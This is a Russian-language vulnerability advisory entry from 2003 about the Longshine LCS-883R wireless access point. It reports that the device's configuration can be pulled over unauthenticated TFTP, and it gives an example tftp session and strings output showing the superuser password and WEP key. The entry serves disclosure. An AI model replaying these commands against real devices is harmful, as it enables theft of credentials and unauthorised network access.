| Дата публикации: | 10.01.2003 |
| Дата изменения: | 17.10.2006 |
| Всего просмотров: | 1128 |
| Опасность: | |
| Наличие исправления: | |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | |
| Воздействие: | |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | |
| Описание: | Обнаруженная уязвимость в Longshine WLAN Access-Point LCS-883R позволяет атакующему загрузить конфигурацию устройства через tftp, не зная WEP Secret. Также атакующий может получить неавторизованный доступ к паролю администратора RADIUS сервера. Это "нападение" работает через WLAN (!!!) и Ethernet. Пример :
tftp tftp> connect 192.168.108.48 tftp> get config.img Received 780 bytes in 1.0 seconds tftp> quit [~]/-\>strings config.img DNXLABAP01 <- name of the AP root <- name of the superuser XXXXXX123 <- password from superuser DNXLABLAN <- ssid secu9 <- secret for WEP 7890abcdef <-Также можно загрузить следующие файлы - config.img, wbtune.dat, mac.dat, rom.img, normal.img Уязвимость обнаружена в Longshine LCS-883R-AC-B External WLAN Access Point 22 Mbps и ThreadX ARM7/Green Hills Version G3.0f.3.0c from Express Logic Inc. |
| Ссылки: | Longshine WLAN Access-Point LCS-883R VU#310201 |